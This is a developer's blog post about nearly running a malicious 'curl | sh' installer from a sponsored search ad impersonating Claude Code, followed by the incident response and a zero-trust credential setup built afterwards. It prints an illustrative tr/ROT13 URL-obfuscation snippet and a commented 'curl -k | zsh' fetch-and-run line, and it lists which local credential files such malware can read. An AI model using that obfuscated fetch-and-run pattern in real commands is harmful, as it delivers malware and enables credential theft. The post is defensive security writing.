I Googled 'Claude Code Install' and Nearly Lost Everything
How a single sponsored search result nearly handed my entire machine to an attacker — and the zero-trust local environment I built afterwards.
I consider myself security-aware. I run a locked-down local environment — credentials in 1Password, SSH keys never on disk, short-lived cloud sessions, the works. I know what curl | sh does. And I nearly handed my entire machine to an attacker because I clicked a sponsored Google result.
This is that story, and what I did afterwards.
The curl that almost took everything
I was setting up this blog. I needed Claude Code on a personal laptop and did what every developer does: I googled “Claude Code install.”
The first result was a sponsored ad. And there on (what I thought was) the Anthropic home page: the familiar one-liner. The curl | sh that every developer gets a dopamine hit from, because it means copy, paste, enter, done.
So I copied it. I pasted it. I hit enter.
The script ran. A macOS system password prompt appeared. Nothing visually unusual about it — a standard-looking sudo request. But something felt off. I cannot tell you exactly what. It was not a conscious analysis. It was a gut reaction, the kind you develop after years of working in terminals.
I had started typing my password. I stopped. I cancelled. I rebooted.
That gut reaction saved my machine.
What was behind it
The command I had run was not what it appeared to be. The URL was obfuscated using tr-based character substitution — the kind of trick designed to survive a casual glance and defeat basic content filtering. The curl flags included -k, which skips TLS certificate verification entirely. The output was piped straight to zsh.
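To illustrate the pattern (with a harmless placeholder URL, not the attacker's), tr-based obfuscation can be as simple as a ROT13 shift, so the real URL never appears in the command in plaintext:

```shell
# Illustrative only: how a tr-based substitution hides a URL from a casual glance.
# 'uggcf://rknzcyr.pbz' is ROT13 for a harmless placeholder URL.
url=$(echo 'uggcf://rknzcyr.pbz' | tr 'A-Za-z' 'N-ZA-Mn-za-m')
echo "$url"   # prints: https://example.com

# The malicious version feeds the decoded URL straight into something like:
#   curl -k "$url" | zsh
# -k disables TLS certificate verification; piping to zsh runs whatever comes back.
```

The decoded string only ever exists inside the running shell, which is exactly why a quick read of the pasted one-liner tells you nothing.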
When I later analysed the decoded URL, the 64-character hex string at the end was almost certainly a unique victim identifier. Someone was tracking who ran what.
The payload itself was serious. This was not a script-kiddie prank. The full attack would have installed a Nix-based hidden partition on the machine — the kind of persistence mechanism that could potentially survive a reformat. On top of that: full credential exfiltration, everything readable by the current user sent off to a remote server.
The password prompt was right at the beginning of the script. It needed admin access to install that partition. Because I cancelled before entering my password, the deepest parts of the attack never executed. But everything the script could do as my unprivileged user — reading files, sending data — it could have done in the seconds before I cancelled.
I expected better from you, Google
A paid sponsored result serving obfuscated malware impersonating a mainstream developer tool. I reported it to Google Safe Browsing — but this should never have got through ad review.
The investigation
My first instinct after rebooting was: do not trust this machine.
I did not open a terminal. I did not run anything locally. Instead, I went to Gemini’s web console — a completely separate environment, nothing running on my hardware — and pasted the script URL. I asked Gemini to inspect the contents. Not run it. Just read it and tell me what it does.
It decoded the obfuscation, identified the payload, and confirmed that every script hosted on that site was malware. It could also see that the destructive payload — the partition install, the deep persistence — required the admin password I had not provided.
Armed with Gemini’s report, I opened Claude Code and asked it to investigate further. It swept the machine systematically — every common attack vector: crontab, launch agents, launch daemons, shell profiles, temporary directories, running processes. I also ran a full malware scan. No trace of the malware beyond the command in my shell history, which I then deleted.
I asked Claude Code to write up a full incident report — timestamped, structured, with a complete credential audit. That report went straight into my git-backed “home” knowledgebase, because when something goes wrong, the first thing you want is a clear written record of exactly what happened and what you did about it.
What did this thing have access to?
My gut reaction was immediate and visceral: what could this thing have got hold of?
Luckily, I already work in a fairly sandboxed way. Everything lives in 1Password. Nothing in the macOS Keychain, nothing saved in the browser. AWS goes through Granted SSO with short-lived tokens. So the blast radius was already smaller than it could have been.
But it was not zero. A few things were still on disk:
SSH private key — sitting in ~/.ssh/id_rsa. An older key that sat alongside my 1Password-managed one.
GitHub CLI token — stored in ~/.config/gh/hosts.yml. Access to my personal repositories.
Pulumi Cloud token — plaintext in ~/.pulumi/credentials.json. Access to my infrastructure-as-code organisation.
AWS credentials — fine. Temporary STS token via Granted SSO, already expired by the time I investigated.
Kubernetes config — home server client certificates in ~/.kube/config. Mitigated by the server not being internet-accessible.
macOS Keychain — worth noting for others: the login keychain unlocks automatically when you log in. A script running as your user can silently read items that do not have explicit password-protection ACLs set — many CLI-added items fall into this category. I do not use the Keychain for credentials, but if you do, be aware of this.
Browser-stored passwords — Chrome, Firefox, and Safari all store credentials in databases readable by the current user. Another reason to use a dedicated credential manager rather than browser-saved passwords. Again, not a risk for me — but worth calling out.
The picture was not catastrophic — most of my setup was already locked down. But those few stragglers on disk were enough to make me uncomfortable. It only takes one leaked SSH key or API token to cause real damage.
The response
I rotated everything immediately. Even though the investigation suggested nothing had been exfiltrated, I treated it as if it had.
- SSH key: removed from GitHub, deleted from disk, new key generated inside 1Password — never exported, never on the filesystem
- GitHub CLI token: rotated, moved to 1Password, now injected at runtime via op run
- Pulumi token: revoked, new token in 1Password, plaintext file deleted, now injected via op run
- AWS: no action needed — already temporary tokens via Granted SSO
- Shell history: malicious command removed
Then I audited the security logs. GitHub’s audit log showed no suspicious activity during the incident window — no new keys added, no unexpected pushes, no OAuth authorisations I did not recognise. Same story across other services. Clean.
It seems I was lucky. This time.
The postmortem: what if (when) it happens again?
Here is where my thinking shifted. The question was no longer “did this attack succeed?” It was: when the next one does, how do I make sure it does not matter?
Not because it definitely will — but because I need to assume it could. A moment of inattention. A prompt injection in an inbox scanner. A supply chain compromise in a dependency. The attack surface for developers is enormous and growing, especially as we grant AI agents more access to our systems.
So my assumption now is: assume compromise is possible, and make sure it does not matter. The goal is not to prevent every possible attack. The goal is to ensure that if something gets through, the blast radius is zero.
Zero trust starts on your own machine
The protocol I built afterwards has one rule: no credential should be usable if exfiltrated from disk.
Everything lives in 1Password
Every secret — SSH keys, API tokens, CLI credentials — is stored in 1Password and injected at runtime. Nothing sits on the filesystem.
SSH keys are generated inside 1Password and served by the 1Password SSH agent. The private key never touches disk. It never appears in a file. The agent signs requests in memory, gated by biometric authentication. If someone copies your entire home directory, they get nothing.
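For reference, pointing SSH at the 1Password agent is a two-line config change — the socket path below is the one 1Password documents for macOS:

```ssh-config
# ~/.ssh/config — route all SSH key operations through the 1Password agent
Host *
  IdentityAgent "~/Library/Group Containers/2BUA8C4S2C.com.1password/t/agent.sock"
```

After that, every `ssh` and `git push` goes through the agent, and approval is gated by Touch ID rather than a key file on disk.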
CLI tools — the first port of call is to check whether 1Password has a plugin for the tool. GitHub CLI and Pulumi both have native 1Password plugins that handle authentication seamlessly — no aliases needed, just configure the plugin and it works:
# These tools have 1Password plugins — zero config after setup
gh auth status # authenticated via 1Password plugin
pulumi up # token injected by 1Password plugin
For tools without a plugin, op run injects the token into the subprocess environment without ever writing it to disk:
# Tools without plugins — use op run via a shell alias
alias cloudflare='op run --env-file="$HOME/.config/cloudflare/env" -- cloudflare'
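The env file itself never contains the secret — only a 1Password secret reference in the documented op://vault/item/field form, which op run resolves at launch. The vault and item names below are illustrative:

```shell
# ~/.config/cloudflare/env — a secret *reference*, not a secret
CLOUDFLARE_API_TOKEN="op://Personal/Cloudflare/api-token"
```

Steal this file and you have learned nothing except that I use 1Password.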
No friction in daily use. No credential on disk. Ever.
Short-lived sessions only
AWS access goes through Granted SSO. Every session is a temporary STS token with a tight expiry. Even if exfiltrated, it is useless within hours. I deliberately keep these sessions short.
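For context, Granted drives standard AWS IAM Identity Center profiles defined in ~/.aws/config — something like the following, with all values illustrative:

```ini
# ~/.aws/config — an SSO profile; `assume dev` mints short-lived STS credentials
[profile dev]
sso_start_url  = https://my-org.awsapps.com/start
sso_region     = eu-west-2
sso_account_id = 111111111111
sso_role_name  = DeveloperAccess
region         = eu-west-2
```

Nothing in this file is sensitive: the actual credentials exist only as temporary environment variables in the shell where the session was assumed.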
For any tool that requires a persistent token: it goes in 1Password. There are no exceptions.
Periodic credential audits
I built a Claude Code skill called credential-audit that scans the machine for plaintext credentials — the usual suspects: ~/.aws/credentials, ~/.ssh/*.key, .env files, anything that looks like a token in a config file. I run it regularly. Think of it like running your test suite, but for your own security posture. I have an outstanding action to harden this up or adopt an off-the-shelf skill.
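My actual skill is a Claude Code prompt, but the core sweep is the kind of thing you can sketch in a few lines of shell — the paths and patterns here are illustrative, not exhaustive:

```shell
# Sketch of a plaintext-credential sweep. Extend the file list and
# patterns to match your own toolchain.
credential_sweep() {
  base="${1:-$HOME}"
  # Well-known files that commonly hold long-lived secrets
  for f in .aws/credentials .config/gh/hosts.yml .pulumi/credentials.json; do
    if [ -f "$base/$f" ]; then
      echo "FOUND: $base/$f"
    fi
  done
  # SSH keys and .env files near the top of the tree
  find "$base" -maxdepth 3 -type f \
    \( -path '*/.ssh/id_*' -o -name '.env' \) 2>/dev/null |
    sed 's/^/FOUND: /'
}

credential_sweep "$HOME"
```

An empty result is the goal; every FOUND line is a candidate for rotation into 1Password.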
1Password’s Watchtower feature does something similar at a broader level — flagging compromised passwords, weak credentials, services without MFA. Turn it on.
MFA everywhere
Hardware keys or TOTP on every web service. Non-negotiable. This deserves its own post, and fortunately I’ve followed this practice for years. But for now: if a service supports it and you have not enabled it, do it today.
Living with it: permission hygiene for AI agents
This protocol means I get prompted by 1Password a lot. Every time an agent needs to push to GitHub, every time Pulumi runs, every time an SSH connection is made — 1Password asks for confirmation.
This is where the balance gets delicate.
If you get prompted too much, you will start blindly accepting. And blind acceptance is exactly as dangerous as having no protection at all. You need to find the sweet spot: enough prompts that you are making conscious decisions about access, few enough that you actually read them.
My approach: be somewhat lenient on permissions for common operations, but for every prompt, spend one second asking: what is this session doing, and does it need this?
Usually the answer is obvious. The agent is pushing a PR — of course it needs the SSH key. But occasionally something feels off. An agent asking for credentials it should not need. A session that has been running longer than expected. A prompt that does not match what you thought was happening.
This is where intuition matters. Anthropic’s own guidance on working with AI agents is good here: you cannot review every single command. That is not feasible. But you can develop a feel for when things are going as expected and when they are not. If something feels off, stop the session and investigate what is happening. It is always cheaper to interrupt and check than to let something run that should not be running.
Feature request: 1Password, please give us agent context
When multiple AI agents are running concurrently, the 1Password prompt just says “Terminal wants to use your SSH key.” I would love it to say: “The DynamoDB performance agent wants the Git SSH key to push a PR.” Linking the access request to the session context would make the approve/deny decision trivial. It would be a welcome addition to the multi-agent workflow.
What I still want
An emergency kill switch. A single command — ideally runnable from a separate trusted device — that invalidates every active session across every service. If my machine is compromised right now, I want one button that revokes everything, immediately.
Some services support this individually. But a unified “revoke all sessions everywhere” capability, integrated with 1Password, would be genuinely useful. Today I would have to manually cycle through each service. Under pressure, in an incident, that is too slow.
The uncomfortable truth
I am someone who thinks about security daily. I work with AI agents, I understand the risks, I read about prompt injection and supply chain attacks. And I nearly lost my machine to a Google search.
The curl | sh pattern is a social engineering masterpiece. It is the exact shape of something developers trust: a clean one-liner, the promise of zero friction, the dopamine hit of a fast install. It is designed to bypass the part of your brain that asks questions.
I got lucky. A vague feeling. A few seconds of hesitation. That is not a security strategy.
What I have now — 1Password holding everything, nothing on disk, short-lived sessions, regular audits, conscious permission decisions — that is a security strategy. It assumes I will make mistakes. It assumes something will get through. And it ensures that when it does, there is nothing to take.
If you have read my first post, you will know that boundaries are the overarching theme of everything I write about here. The same principle applies to your local environment: if credentials are isolated, sessions are scoped, and access requires explicit approval, then a breach in one area cannot cascade into everything else. Zero trust is boundary discipline applied to your own machine.
Treat your laptop as a hostile environment, because one day it will be.
If you work with AI coding agents, I would strongly recommend auditing what credentials are sitting on your local disk right now. You might be surprised. The `security find-generic-password` command on macOS, a quick `ls` of your home directory config files, and a check of `~/.ssh/` will tell you most of what you need to know. Then move everything into a credential manager and never look back.